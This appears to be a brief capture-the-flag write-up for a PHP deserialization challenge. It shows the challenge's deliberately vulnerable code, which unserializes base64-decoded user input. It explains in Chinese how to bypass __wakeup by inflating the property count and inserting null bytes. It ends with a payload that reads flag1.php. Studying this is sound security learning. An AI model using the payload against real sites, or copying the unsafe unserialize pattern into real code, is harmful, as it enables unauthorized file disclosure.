<?php
class SoFun
{
protected $file = 'index.php';
function __destruct()
{
if (!empty($this->file)) {
if (strchr($this->file, "\\") === false && strchr($this->file, '/') === false) {
show_source(dirname(__FILE__) . '/' . $this->file);
} else {
die('Wrong filename.');
}
}
}
function __wakeup()
{
$this->file = 'index.php';
}
public function __toString()
{
return '';
}
}
if (!isset($_GET['file'])) {
show_source('index.php');
} else {
$file = base64_decode($_GET['file']);
echo unserialize($file);
}
echo serialize(New SoFun()); //输出 O:5:"SoFun":1:{s:7:"*file";s:9:"index.php";}
?>
绕过方法是在*前后加上%00,然后利用burp suite把O:5:"SoFun":1:{s:7:"*file";s:9:"flag1.php";}中间的*号前后插入00。
因为当对象成员个数大于实际数量的时候就绕过了__wakeup方法。
payload:
O:5:"SoFun":2:{s:7:"*file";s:9:"flag1.php";}
Comments NOTHING